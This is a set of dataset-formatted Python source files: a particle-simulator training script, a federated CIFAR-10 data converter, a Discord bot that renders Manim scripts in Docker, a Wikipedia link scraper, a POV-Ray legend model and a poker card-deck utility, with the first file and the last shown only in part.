kinematic particles from prescribed trajectory.\n kinematic_mask = (particle_types == KINEMATIC_PARTICLE_ID).clone().detach().to(device)\n next_position_ground_truth = ground_truth_positions[:, step]\n kinematic_mask = kinematic_mask.bool()[:, None].expand(-1, current_positions.shape[-1])\n next_position = torch.where(\n kinematic_mask, next_position_ground_truth, next_position)\n predictions.append(next_position)\n\n # Shift `current_positions`, removing the oldest position in the sequence\n # and appending the next position at the end.\n current_positions = torch.cat(\n [current_positions[:, 1:], next_position[:, None, :]], dim=1)\n\n # Predictions with shape (time, nnodes, dim)\n predictions = torch.stack(predictions)\n ground_truth_positions = ground_truth_positions.permute(1, 0, 2)\n\n loss = (predictions - ground_truth_positions) ** 2\n\n output_dict = {\n 'initial_positions': initial_positions.permute(1, 0, 2).cpu().numpy(),\n 'predicted_rollout': predictions.cpu().numpy(),\n 'ground_truth_rollout': ground_truth_positions.cpu().numpy(),\n 'particle_types': particle_types.cpu().numpy(),\n }\n\n return output_dict, loss\n\n\ndef predict(device: str, FLAGS, flags, world_size):\n \"\"\"Predict rollouts.\n\n Args:\n simulator: Trained simulator if not will undergo training.\n\n \"\"\"\n metadata = reading_utils.read_metadata(FLAGS.data_path)\n simulator = _get_simulator(metadata, FLAGS.noise_std, FLAGS.noise_std, device)\n\n # Load simulator\n if os.path.exists(FLAGS.model_path + FLAGS.model_file):\n simulator.load(FLAGS.model_path + FLAGS.model_file)\n else:\n train(simulator, flags, world_size, device)\n simulator.to(device)\n simulator.eval()\n\n # Output path\n if not os.path.exists(FLAGS.output_path):\n os.makedirs(FLAGS.output_path)\n\n # Use `valid`` set for eval mode if not use `test`\n split = 'test' if FLAGS.mode == 'rollout' else 'valid'\n\n ds = 
data_loader.get_data_loader_by_trajectories(path=f\"{FLAGS.data_path}{split}.npz\")\n\n eval_loss = []\n with torch.no_grad():\n for example_i, (positions, particle_type, n_particles_per_example) in enumerate(ds):\n positions.to(device)\n particle_type.to(device)\n n_particles_per_example = torch.tensor([int(n_particles_per_example)], dtype=torch.int32).to(device)\n\n nsteps = metadata['sequence_length'] - INPUT_SEQUENCE_LENGTH\n # Predict example rollout\n example_rollout, loss = rollout(simulator, positions.to(device), particle_type.to(device),\n n_particles_per_example.to(device), nsteps, device)\n\n example_rollout['metadata'] = metadata\n print(\"Predicting example {} loss: {}\".format(example_i, loss.mean()))\n eval_loss.append(torch.flatten(loss))\n\n # Save rollout in testing\n if FLAGS.mode == 'rollout':\n example_rollout['metadata'] = metadata\n filename = f'rollout_{example_i}.pkl'\n filename = os.path.join(FLAGS.output_path, filename)\n with open(filename, 'wb') as f:\n pickle.dump(example_rollout, f)\n\n print(\"Mean loss on rollout prediction: {}\".format(\n torch.mean(torch.cat(eval_loss))))\n\ndef optimizer_to(optim, device):\n for param in optim.state.values():\n # Not sure there are any global tensors in the state dict\n if isinstance(param, torch.Tensor):\n param.data = param.data.to(device)\n if param._grad is not None:\n param._grad.data = param._grad.data.to(device)\n elif isinstance(param, dict):\n for subparam in param.values():\n if isinstance(subparam, torch.Tensor):\n subparam.data = subparam.data.to(device)\n if subparam._grad is not None:\n subparam._grad.data = subparam._grad.data.to(device)\n\ndef train(rank, flags, world_size, device):\n \"\"\"Train the model.\n\n Args:\n rank: local rank\n world_size: total number of ranks\n device: torch device type\n \"\"\"\n if device == torch.device(\"cuda\"):\n distribute.setup(rank, world_size, device)\n device_id = rank\n else:\n device_id = device\n\n metadata = reading_utils.read_metadata(flags[\"data_path\"])\n\n if device == torch.device(\"cuda\"):\n serial_simulator = _get_simulator(metadata, flags[\"noise_std\"], flags[\"noise_std\"], rank)\n simulator = DDP(serial_simulator.to(rank), device_ids=[rank], output_device=rank)\n optimizer = torch.optim.Adam(simulator.parameters(), lr=flags[\"lr_init\"]*world_size)\n else:\n simulator = _get_simulator(metadata, flags[\"noise_std\"], flags[\"noise_std\"], device)\n optimizer = torch.optim.Adam(simulator.parameters(), lr=flags[\"lr_init\"] * world_size)\n step = 0\n\n # If model_path does exist and model_file and train_state_file exist continue training.\n if flags[\"model_file\"] is not None:\n\n if flags[\"model_file\"] == \"latest\" and flags[\"train_state_file\"] == \"latest\":\n # find the latest model, assumes model and train_state files are in step.\n fnames = glob.glob(f'{flags[\"model_path\"]}*model*pt')\n max_model_number = 0\n expr = re.compile(\".*model-(\\d+).pt\")\n for fname in fnames:\n model_num = int(expr.search(fname).groups()[0])\n if model_num > max_model_number:\n max_model_number = model_num\n # reset names to point to the latest.\n flags[\"model_file\"] = f\"model-{max_model_number}.pt\"\n flags[\"train_state_file\"] = f\"train_state-{max_model_number}.pt\"\n\n if os.path.exists(flags[\"model_path\"] + flags[\"model_file\"]) and os.path.exists(flags[\"model_path\"] + flags[\"train_state_file\"]):\n # load model\n if device == torch.device(\"cuda\"):\n simulator.module.load(flags[\"model_path\"] + flags[\"model_file\"])\n else:\n 
simulator.load(flags[\"model_path\"] + flags[\"model_file\"])\n\n # load train state\n train_state = torch.load(flags[\"model_path\"] + flags[\"train_state_file\"])\n # set optimizer state\n optimizer = torch.optim.Adam(\n simulator.module.parameters() if device == torch.device(\"cuda\") else simulator.parameters())\n optimizer.load_state_dict(train_state[\"optimizer_state\"])\n optimizer_to(optimizer, device_id)\n # set global train state\n step = train_state[\"global_train_state\"].pop(\"step\")\n\n else:\n msg = f'Specified model_file {flags[\"model_path\"] + flags[\"model_file\"]} and train_state_file {flags[\"model_path\"] + flags[\"train_state_file\"]} not found.'\n raise FileNotFoundError(msg)\n\n simulator.train()\n simulator.to(device_id)\n\n if device == torch.device(\"cuda\"):\n dl = distribute.get_data_distributed_dataloader_by_samples(path=f'{flags[\"data_path\"]}train.npz',\n input_length_sequence=INPUT_SEQUENCE_LENGTH,\n batch_size=flags[\"batch_size\"],\n )\n else:\n dl = data_loader.get_data_loader_by_samples(path=f'{flags[\"data_path\"]}train.npz',\n input_length_sequence=INPUT_SEQUENCE_LENGTH,\n batch_size=flags[\"batch_size\"],\n )\n\n print(f\"rank = {rank}, cuda = {torch.cuda.is_available()}\")\n not_reached_nsteps = True\n try:\n while not_reached_nsteps:\n if device == torch.device(\"cuda\"):\n torch.distributed.barrier()\n else:\n pass\n for ((position, particle_type, n_particles_per_example), labels) in dl:\n position.to(device_id)\n particle_type.to(device_id)\n n_particles_per_example.to(device_id)\n labels.to(device_id)\n\n # TODO (jpv): Move noise addition to data_loader\n # Sample the noise to add to the inputs to the model during training.\n sampled_noise = noise_utils.get_random_walk_noise_for_position_sequence(position, noise_std_last_step=flags[\"noise_std\"]).to(device_id)\n non_kinematic_mask = (particle_type != KINEMATIC_PARTICLE_ID).clone().detach().to(device_id)\n sampled_noise *= non_kinematic_mask.view(-1, 1, 1)\n\n # Get the predictions and target accelerations.\n if device == torch.device(\"cuda\"):\n pred_acc, target_acc = simulator.module.predict_accelerations(\n next_positions=labels.to(rank),\n position_sequence_noise=sampled_noise.to(rank),\n position_sequence=position.to(rank),\n nparticles_per_example=n_particles_per_example.to(rank),\n particle_types=particle_type.to(rank))\n else:\n pred_acc, target_acc = simulator.predict_accelerations(\n next_positions=labels.to(device),\n position_sequence_noise=sampled_noise.to(device),\n position_sequence=position.to(device),\n nparticles_per_example=n_particles_per_example.to(device),\n particle_types=particle_type.to(device))\n\n # Calculate the loss and mask out loss on kinematic particles\n loss = (pred_acc - target_acc) ** 2\n loss = loss.sum(dim=-1)\n num_non_kinematic = non_kinematic_mask.sum()\n loss = torch.where(non_kinematic_mask.bool(),\n loss, torch.zeros_like(loss))\n loss = loss.sum() / num_non_kinematic\n\n # Computes the gradient of loss\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Update learning rate\n lr_new = flags[\"lr_init\"] * (flags[\"lr_decay\"] ** (step/flags[\"lr_decay_steps\"])) * world_size\n for param in optimizer.param_groups:\n param['lr'] = lr_new\n\n if rank == 0 or device == torch.device(\"cpu\"):\n print(f'Training step: {step}/{flags[\"ntraining_steps\"]}. 
Loss: {loss}.')\n # Save model state\n if step % flags[\"nsave_steps\"] == 0:\n if device == torch.device(\"cpu\"):\n simulator.save(flags[\"model_path\"] + 'model-'+str(step)+'.pt')\n else:\n simulator.module.save(flags[\"model_path\"] + 'model-'+str(step)+'.pt')\n train_state = dict(optimizer_state=optimizer.state_dict(),\n global_train_state={\"step\": step},\n loss=loss.item())\n torch.save(train_state, f'{flags[\"model_path\"]}train_state-{step}.pt')\n\n # Complete training\n if (step >= flags[\"ntraining_steps\"]):\n not_reached_nsteps = False\n break\n\n step += 1\n\n except KeyboardInterrupt:\n pass\n\n if rank == 0 or device == torch.device(\"cpu\"):\n if device == torch.device(\"cpu\"):\n simulator.save(flags[\"model_path\"] + 'model-'+str(step)+'.pt')\n else:\n simulator.module.save(flags[\"model_path\"] + 'model-'+str(step)+'.pt')\n train_state = dict(optimizer_state=optimizer.state_dict(),\n global_train_state={\"step\": step},\n loss=loss.item())\n torch.save(train_state, f'{flags[\"model_path\"]}train_state-{step}.pt')\n\n if torch.cuda.is_available():\n distribute.cleanup()\n\n\ndef _get_simulator(\n metadata: json,\n acc_noise_std: float,\n vel_noise_std: float,\n device: str) -> learned_simulator.LearnedSimulator:\n \"\"\"Instantiates the simulator.\n\n Args:\n metadata: JSON object with metadata.\n acc_noise_std: Acceleration noise std deviation.\n vel_noise_std: Velocity noise std deviation.\n device: PyTorch device 'cpu' or 'cuda'.\n \"\"\"\n\n # Normalization stats\n normalization_stats = {\n 'acceleration': {\n 'mean': torch.FloatTensor(metadata['acc_mean']).to(device),\n 'std': torch.sqrt(torch.FloatTensor(metadata['acc_std'])**2 +\n acc_noise_std**2).to(device),\n },\n 'velocity': {\n 'mean': torch.FloatTensor(metadata['vel_mean']).to(device),\n 'std': torch.sqrt(torch.FloatTensor(metadata['vel_std'])**2 +\n vel_noise_std**2).to(device),\n },\n }\n\n simulator = learned_simulator.LearnedSimulator(\n particle_dimensions=metadata['dim'],\n nnode_in=37 if metadata['dim'] == 3 else 30,\n nedge_in=metadata['dim'] + 1,\n latent_dim=128,\n nmessage_passing_steps=10,\n nmlp_layers=2,\n mlp_hidden_dim=128,\n connectivity_radius=metadata['default_connectivity_radius'],\n boundaries=np.array(metadata['bounds']),\n normalization_stats=normalization_stats,\n nparticle_types=NUM_PARTICLE_TYPES,\n particle_type_embedding_size=16,\n device=device)\n\n return simulator\n\n\ndef main(_):\n \"\"\"Train or evaluates the model.\n\n \"\"\"\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n if device == torch.device('cuda'):\n os.environ[\"MASTER_ADDR\"] = \"localhost\"\n os.environ[\"MASTER_PORT\"] = \"29500\"\n FLAGS = flags.FLAGS\n myflags = {}\n myflags[\"data_path\"] = FLAGS.data_path\n myflags[\"noise_std\"] = FLAGS.noise_std\n myflags[\"lr_init\"] = FLAGS.lr_init\n myflags[\"lr_decay\"] = FLAGS.lr_decay\n myflags[\"lr_decay_steps\"] = FLAGS.lr_decay_steps\n myflags[\"batch_size\"] = FLAGS.batch_size\n myflags[\"ntraining_steps\"] = FLAGS.ntraining_steps\n myflags[\"nsave_steps\"] = FLAGS.nsave_steps\n myflags[\"model_file\"] = FLAGS.model_file\n myflags[\"model_path\"] = FLAGS.model_path\n myflags[\"train_state_file\"] = FLAGS.train_state_file\n\n if FLAGS.mode == 'train':\n # If model_path does not exist create new directory.\n if not os.path.exists(FLAGS.model_path):\n os.makedirs(FLAGS.model_path)\n\n # Train on gpu \n if device == torch.device('cuda'):\n world_size = torch.cuda.device_count()\n print(f\"world_size = {world_size}\")\n 
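# spawn one training process per visible GPU; each process receives its rank as the first argument to train()\n 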
distribute.spawn_train(train, myflags, world_size, device)\n\n # Train on cpu \n else:\n rank = None\n world_size = 1\n train(rank, myflags, world_size, device)\n\n elif FLAGS.mode in ['valid', 'rollout']:\n # Set device\n world_size = torch.cuda.device_count()\n if FLAGS.cuda_device_number is not None and torch.cuda.is_available():\n device = torch.device(f'cuda:{int(FLAGS.cuda_device_number)}')\n predict(device, FLAGS, flags=myflags, world_size=world_size)\n\n\nif __name__ == '__main__':\n app.run(main)\n","sub_path":"gns/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"235815477","text":"import os\nimport argparse\nfrom csv import DictReader\nimport json\n\n# ONE_TRAIN_FILE = True\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-alpha',\n required=True,\n type=float,\n choices=[0.00, 0.05, 0.10, 0.20, 0.50, 1.00, 10.00, 10.00, 100.00])\n return parser.parse_args()\n\ndef save_as_json_file(filename, data):\n with open(filename, 'w+') as fp:\n json.dump(data, fp)\n\ndef parse_file_information(file_path, train=True):\n dictionary = {\"users\": [], \"num_samples\": [], \"user_data\": {}}\n user_data = {}\n n_users = 100 # start assigning user_id from 100 for test users\n with open(file_path, 'r') as file:\n reader = DictReader(file)\n next(reader) # skip header\n for line in reader:\n if train:\n user_id = int(line['user_id'])\n else:\n user_id = n_users\n filename = line['filename']\n filename = filename.split('/')[-1]\n if not train:\n filename = '/test/' + filename\n print(filename)\n class_id = int(line['class'])\n if user_id not in dictionary[\"users\"]:\n dictionary[\"users\"].append(user_id)\n if user_id not in user_data:\n user_data[user_id] = {'x': [], 'y': []}\n user_data[user_id]['x'].append(filename)\n user_data[user_id]['y'].append(class_id)\n\n for user in dictionary[\"users\"]:\n dictionary[\"user_data\"][user] = user_data[user]\n dictionary[\"num_samples\"].append(len(user_data[user]['y']))\n\n return dictionary\n\ndef parse_file(csv_path, dir_path, train=True, alpha=None):\n if train and alpha is not None:\n if alpha == 0.05:\n f = 'federated_train_alpha_' + str(alpha) + '.csv'\n else:\n f = 'federated_train_alpha_' + str(alpha) + '0.csv'\n elif not train:\n f = 'test.csv'\n print(\"Parsing file \", f)\n file_path = os.path.join(csv_path, f)\n dictionary = parse_file_information(file_path, train)\n f_name = f[:-4] + '.json'\n json_path = os.path.join(dir_path, f_name)\n save_as_json_file(json_path, dictionary)\n\n\ndef main():\n args = parse_args()\n alpha = args.alpha\n assert alpha in [0.00, 0.05, 0.10, 0.20, 0.50, 1.00, 10.00, 10.00, 100.00]\n csv_path = os.path.join('.', 'cifar10_with_name')\n if not os.path.exists(csv_path):\n print(\"Launch program in /FedAvg_pytorch/data/cifar10/preprocessing/\")\n exit(0)\n\n # Create train and test directories to store json files\n train_data_dir = os.path.join('..', 'data', 'train')\n test_data_dir = os.path.join('..', 'data', 'test')\n if not os.path.exists(train_data_dir):\n os.makedirs(train_data_dir)\n if not os.path.exists(test_data_dir):\n os.makedirs(test_data_dir)\n\n # Read files and save them as json in the required format\n parse_file(csv_path, train_data_dir, alpha=alpha)\n parse_file(csv_path, test_data_dir, train=False)\n\n\nif __name__ == '__main__':\n 
main()","sub_path":"data/cifar10/preprocessing/data_to_json.py","file_name":"data_to_json.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"335437392","text":"import asyncio\nimport discord\nimport docker\nimport os\nimport tempfile\nimport re\nimport io\n\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nfrom pathlib import Path\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\ndockerclient = docker.from_env()\n\nbot = commands.Bot(\n command_prefix=\"!\",\n description=\"I render simple Manim Scripts.\",\n case_insensitive=False\n)\n\n@bot.event\nasync def on_ready():\n await bot.change_presence(activity=discord.Game(name='The Waiting Game'))\n print(f'Logged in as {bot.user.name}')\n return\n\n@bot.command()\nasync def mhelp(ctx):\n await ctx.send(\"\"\"A simple Manim rendering bot.\n\nUse the `!manimate` command to render short and simple Manim scripts.\nCode **must** be properly formatted and indented. Note that you can't animate through DM's.\n\nSupported tags:\n```\n -t, --transparent, -i, --save_as_gif, -s, --save_last_frame\n```\nExample:\n```\n!manimate -s\n\\`\\`\\`py\ndef construct(self):\n self.play(ReplacementTransform(Square(), Circle()))\n\\`\\`\\`\n```\n\"\"\")\n\n@bot.command(aliases=['m'])\n@commands.guild_only()\nasync def manimate(ctx, *, arg):\n\n def construct_reply(arg):\n if arg.startswith('```'): # empty header\n arg = '\\n' + arg\n header, *body = arg.split('\\n')\n\n cli_flags = header.split()\n allowed_flags = [\n \"-i\", \"--save_as_gif\",\n \"-s\", \"--save_last_frame\",\n \"-t\", \"--transparent\"\n ]\n if not all([flag in allowed_flags for flag in cli_flags]):\n reply_args = {\"content\": \"You cannot pass CLI flags other than \"\n \"`-i` (`--save_as_gif`), `-s` (`--save_last_frame`), \"\n \"`-t` (`--transparent`).\"}\n return reply_args\n else:\n cli_flags = ' '.join(cli_flags)\n\n body = '\\n'.join(body).strip()\n\n if body.count('```') != 2:\n reply_args = {\n \"content\": 'Your message is not properly formatted. 
'\n 'Your code has to be written in a code block, like so:\\n'\n '\\\\`\\\\`\\\\`py\\nyour code here\\n\\\\`\\\\`\\\\`'\n }\n return reply_args\n\n script=re.search(\n pattern = r\"```(?:py)?(?:thon)?(.*)```\",\n string = body,\n flags=re.DOTALL,\n ).group(1)\n script = script.strip()\n\n # for convenience: allow construct-only:\n if script.startswith('def construct(self):'):\n script = ['class Manimation(Scene):'] + [\" \" + line for line in script.split(\"\\n\")]\n else:\n script = script.split(\"\\n\")\n\n script = [\"from manim import *\"] + script\n\n # write code to temporary file (ideally in temporary directory)\n with tempfile.TemporaryDirectory() as tmpdirname:\n scriptfile = Path(tmpdirname) / 'script.py'\n with open(scriptfile, 'w', encoding='utf-8') as f:\n f.write('\\n'.join(script))\n try: # now it's getting serious: get docker involved\n reply_args = None\n container_stderr = dockerclient.containers.run(\n image=\"manimcommunity/manim:stable\",\n volumes={tmpdirname: {'bind': '/manim/', 'mode': 'rw'}},\n command=f\"timeout 120 manim -qm --disable_caching --progress_bar=none -o scriptoutput {cli_flags} /manim/script.py\",\n user=os.getuid(),\n stderr=True,\n stdout=False,\n remove=True\n )\n if container_stderr:\n if len(container_stderr.decode('utf-8')) <= 1200:\n reply_args = {\n \"content\": \"Something went wrong, here is \"\n \"what Manim reports:\\n\"\n f\"```\\n{container_stderr.decode('utf-8')}\\n```\"\n }\n else:\n reply_args = {\n \"content\": \"Something went wrong, here is \"\n \"what Manim reports:\\n\",\n \"file\": discord.File(\n fp=io.BytesIO(container_stderr),\n filename=\"Error.log\",\n )\n }\n\n return reply_args\n\n except Exception as e:\n reply_args = {\"content\": f\"Something went wrong: ```{e}```\"}\n raise e\n finally:\n if reply_args:\n return reply_args\n\n try:\n [outfilepath] = Path(tmpdirname).rglob('scriptoutput.*')\n except Exception as e:\n reply_args = {\"content\": \"Something went wrong: no (unique) output file was produced. :cry:\"}\n raise e\n else:\n reply_args = {\"content\": \"Here you go:\", \"file\": discord.File(outfilepath)}\n finally:\n return reply_args\n\n async def react_and_wait(reply):\n await reply.add_reaction(\"\\U0001F5D1\") # Trashcan emoji\n\n def check(reaction, user):\n return str(reaction.emoji) == '\\U0001F5D1' and user == ctx.author\n\n try:\n reaction, user = await bot.wait_for('reaction_add', check=check, timeout=60.0)\n except asyncio.TimeoutError:\n await reply.remove_reaction(\"\\U0001F5D1\", bot.user)\n else:\n await reply.delete()\n\n async with ctx.typing():\n reply_args = construct_reply(arg)\n reply = await ctx.reply(**reply_args)\n\n await react_and_wait(reply)\n return\n\n\n@bot.command()\n@commands.guild_only()\nasync def mdoc(ctx, *args):\n if len(args) == 0:\n await ctx.reply(\n \"Pass some manim function or class and I will find the \"\n \"corresponding documentation for you. 
Example: `!mdoc Square`\"\n )\n return\n\n arg = args[0]\n if not arg.isidentifier():\n await ctx.reply(f\"`{arg}` is not a valid identifier, no class or function can be named like that.\")\n return\n\n try:\n container_output = dockerclient.containers.run(\n image=\"manimcommunity/manim:stable\",\n command=f\"\"\"timeout 10 python -c \"import manim; assert '{arg}' in dir(manim); print(manim.{arg}.__module__ + '.{arg}')\" \"\"\",\n user=os.getuid(),\n stderr=False,\n stdout=True,\n detach=False,\n remove=True\n )\n except docker.errors.ContainerError as e:\n if 'AssertionError' in e.args[0]:\n await ctx.reply(f\"I could not find `{arg}` in our documentation, sorry.\")\n return\n await ctx.reply(f\"Something went wrong: ```{e.args[0]}```\")\n return\n \n fqname = container_output.decode(\"utf-8\").strip().splitlines()[2]\n url = f\"https://docs.manim.community/en/stable/reference/{fqname}.html\"\n await ctx.reply(f\"Here you go: {url}\")\n return\n \n\nbot.run(TOKEN, bot=True, reconnect=True)\n","sub_path":"DiscordManimator.py","file_name":"DiscordManimator.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"47546341","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport datetime\nimport random\nimport re\nimport ssl\n\ncontext = ssl._create_unverified_context()\nheader = {\"User-Agent\":\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Mobile Safari/537.36\"}\n\nrandom.seed(datetime.datetime.now())\ndef getlinks(articleUrl):\n url = (\"https://en.wikipedia.org\"+articleUrl)\n request = urllib.request.Request(url, headers=header)\n print(url)\n html = urllib.request.urlopen(request, context=context)\n\n bsObj = BeautifulSoup(html, 'lxml')\n return bsObj.find(\"div\", {\"id\":\"bodyContent\"}).find_all(\"a\", href=re.compile(\"^(/wiki/)((?!:).)*$\"))\nlinks = getlinks(\"/wiki/Kevin_Bacon\")\nwhile len(links) > 0:\n newArticle = links[random.randint(0, len(links) - 1)].attrs[\"href\"]\n print(newArticle)\n links = getlinks(newArticle)","sub_path":"pythonwikiWord.py","file_name":"pythonwikiWord.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206309096","text":"#!/usr/bin/env python\n\n\"\"\"\ncontains a single function ('legend')\nto make an importable legend for use in other programs.\n\nThis function stores all objects to render in dictionaries and makes for an importable legend to use in combined.py\n\"\"\"\n\n__author__ = \"wesley rorije\"\n__version__ = \"1.0\"\n\nfrom vapory import Cylinder, Cone, Pigment, Texture, Finish, Scene, LightSource, Camera\nfrom pypovray import pypovray, pdb, models, load_config\n\n\ndef legend(start_position, axis_length):\n \"\"\" Legend function for calling importable legend\"\"\"\n\n # Reduce the AXIS_LENGTH by the length of the Cone (1) so that\n # the total length is exactly the AXIS_LENGTH\n axis_length -= 1\n\n # Initialize the Cylinder END-position to a COPY of the start position\n cylinder_coords_end = {\n 'x': list(start_position),\n 'y': list(start_position),\n 'z': list(start_position)\n }\n\n # Add the AXIS_LENGTHs to the corresponding coordinate\n cylinder_coords_end['x'][0] += axis_length\n cylinder_coords_end['y'][1] += axis_length\n cylinder_coords_end['z'][2] += axis_length\n\n # creation of the Cylinders\n\n style = Texture(Pigment('color', [0.80, 0.00, 1.00], 
'filter', 0.7),\n Finish('phong', 0.6, 'reflection', 0.4))\n linex = Cylinder(start_position, cylinder_coords_end['x'], 0.1, style)\n liney = Cylinder(start_position, cylinder_coords_end['y'], 0.1, style)\n linez = Cylinder(start_position, cylinder_coords_end['z'], 0.1, style)\n\n cylinders = {\n 'x': linex,\n 'y': liney,\n 'z': linez\n }\n\n # Cone START is the same as the Cylinder END, so we COPY these lists\n cones_coords_start = {\n 'x': list(cylinder_coords_end['x']),\n 'y': list(cylinder_coords_end['y']),\n 'z': list(cylinder_coords_end['z'])\n }\n\n # Copy the START as END coordinate\n cones_coords_end = {\n 'x': list(cones_coords_start['x']),\n 'y': list(cones_coords_start['y']),\n 'z': list(cones_coords_start['z'])\n }\n\n # Extend the tip of the cones with length 1\n cones_coords_end['x'][0] += 1\n cones_coords_end['y'][1] += 1\n cones_coords_end['z'][2] += 1\n\n # Creation of the Cones\n\n conex = Cone(cones_coords_start['x'], 0.5, cones_coords_end['x'], 0, style)\n coney = Cone(cones_coords_start['y'], 0.5, cones_coords_end['y'], 0, style)\n conez = Cone(cones_coords_start['z'], 0.5, cones_coords_end['z'], 0, style)\n\n cones = {\n 'x': conex,\n 'y': coney,\n 'z': conez\n }\n\n # Add ALL objects to a LIST and return\n legend_objects = list(cylinders.values()) + list(cones.values())\n\n return legend_objects\n\n\ndef frame(step):\n \"\"\" Creates a Lightsource a default Camera and calls the Shape function and places this in a scene \"\"\"\n lichtje = LightSource([2, 8, -5], 5.0)\n default_camera = Camera('location', [-5, 8, -20], 'look_at', [-5, 0, -5])\n shapes = legend([-15, 0, 0], 5)\n # Return the Scene object for rendering\n return Scene(default_camera,\n objects=[lichtje] + shapes)\n\n\nif __name__ == '__main__':\n \"\"\" Main function for rendering Legend function on its own \"\"\"\n pypovray.render_scene_to_png(frame)\n","sub_path":"assignment2a.py","file_name":"assignment2a.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"377588642","text":"# -*- coding: utf-8 -*-\n\nimport random\nfrom tkinter import *\n\nclass CardDeck:\n \n def __init__(self):\n self.heads = set([\"A\",\"K\",\"Q\",\"J\",\"T\",\"9\",\"8\",\"7\",\"6\",\"5\",\"4\",\"3\",\"2\"])\n self.colors = set([\"s\",\"c\",\"h\",\"d\"])\n self.cardsInDeck = {a+b for a in self.heads for b in self.colors}\n self.handValue = {2:\"2\",3:\"3\",4:\"4\",5:\"5\",6:\"6\",7:\"7\",8:\"8\",9:\"9\",10:\"T\",11:\"J\",12:\"Q\",13:\"K\",14:\"A\"}\n self.heroPoketHand = []\n self.board = []\n self.cardsMatrix = []\n self.buttons = []\n self.createCardFilter()\n \n def generateHeroCards(self):\n (a,b) = random.sample(self.cardsInDeck, 2)\n self.cardsInDeck.remove(a)\n self.cardsInDeck.remove(b)\n self.heroPoketHand.append(a)\n self.heroPoketHand.append(b)\n return self.heroPoketHand\n \n def generateFlop(self):\n (a,b,c) = random.sample(self.cardsInDeck, 3)\n self.cardsInDeck.remove(a)\n self.cardsInDeck.remove(b)\n self.cardsInDeck.remove(c)\n self.board.append(a)\n self.board.append(b)\n self.board.append(c)\n return self.board\n \n def generateTurnOrRiver(self):\n a = random.sample(self.cardsInDeck, 1)\n self.cardsInDeck.remove(a[0])\n self.board.append(a[0])\n return self.board\n \n def generateCompleteBoard(self):\n self.generateFlop()\n self.generateTurnOrRiver()\n self.generateTurnOrRiver()\n return self.board\n \n def createCardFilter(self):\n counter = 0\n for i in range(14,1,-1):\n self.cardsMatrix.append([])\n for j in 
range(14,1,-1):\n if i == j:\n self.cardsMatrix[counter].append(self.handValue.get(i) + self.handValue.get(j))\n elif j < i:\n self.cardsMatrix[counter].append(self.handValue.get(i) + self.handValue.get(j) + \"s\")\n elif j > i:\n self.cardsMatrix[counter].append(self.handValue.get(j) + self.handValue.get(i) + \"o\")\n counter += 1\n return self.cardsMatrix\n \n def printCardsMatrix(self):\n for i in range(13):\n for j in range(13):\n print(str(self.cardsMatrix[i][j]) + \" \", end =' ')\n print(\"\")\n \n def selectCards(self, cards):\n result = []\n if cards[0] == cards[1]:\n result.append(cards[0]+\"c\"+cards[0]+\"d\")\n result.append(cards[0]+\"c\"+cards[0]+\"h\")\n result.append(cards[0]+\"c\"+cards[0]+\"s\")\n result.append(cards[0]+\"d\"+cards[0]+\"h\")\n result.append(cards[0]+\"d\"+cards[0]+\"s\")\n result.append(cards[0]+\"h\"+cards[0]+\"s\")\n elif cards[2] == \"s\":\n result.append(cards[0]+\"c\"+cards[1]+\"c\")\n result.append(cards[0]+\"d\"+cards[1]+\"d\")\n result.append(cards[0]+\"h\"+cards[1]+\"h\")\n result.append(cards[0]+\"s\"+cards[1]+\"s\")\n elif cards[2] == \"o\":\n result.append(cards[0]+\"c\"+cards[1]+\"d\")\n result.append(cards[0]+\"c\"+cards[1]+\"h\")\n result.append(cards[0]+\"c\"+cards[1]+\"s\")\n result.append(cards[0]+\"d\"+cards[1]+\"h\")\n result.append(cards[0]+\"d\"+cards[1]+\"s\")\n result.append(cards[0]+\"h\"+cards[1]+\"s\")\n result.append(cards[0]+\"d\"+cards[1]+\"c\")\n result.append(cards[0]+\"h\"+cards[1]+\"c\")\n result.append(cards[0]+\"s\"+cards[1]+\"c\")\n result.append(cards[0]+\"h\"+cards[1]+\"d\")\n result.append(cards[0]+\"s\"+cards[1]+\"d\")\n result.append(cards[0]+\"s\"+cards[1]+\"h\")\n return result\n \n def selectRange(self, listOfCards):\n result = []\n for c in listOfCards:\n result = result + self.selectCards(c)\n return result\n \n \n def colorChange(self, t):\n #self.buttons[i][j].configure(bg = \"red\")\n counter = 0\n for e in self.buttons[t[0]]:\n if counter == t[1]:\n if e.cget('background')!=\"red\":\n e.configure(bg = \"red\")\n else:\n e.configure(bg = \"white\")\n counter += 1\n \n def CardsMatrixWindows(self):\n fenetre = Tk()\n counter = 0\n btnWidth = 6\n btnHeight = 3\n line = 0\n column = 0\n for i in range(14,1,-1):\n self.buttons.append([])\n for j in range(14,1,-1):\n if i == j:\n self.buttons[counter].append(Button(fenetre, text=self.handValue.get(i) + self.handValue.get(j),bg=\"white\", height=btnHeight, width=btnWidth, command=lambda arg1=(line,column):self.colorChange(arg1)))\n elif j < i:\n self.buttons[counter].append(Button(fenetre, text=self.handValue.get(i) + self.handValue.get(j) + \"s\",bg=\"white\", height=btnHeight, width=btnWidth, command=lambda arg1=(line,column):self.colorChange(arg1)))\n elif j > i:\n self.buttons[counter].append(Button(fenetre, text=self.handValue.get(j) + self.handValue.get(i) + \"o\",bg=\"white\", height=btnHeight, width=btnWidth, command=lambda arg1=(line,column):self.colorChange(arg1)))\n column += 1\n counter += 1\n column = 0\n line += 1\n for i in range(13):\n 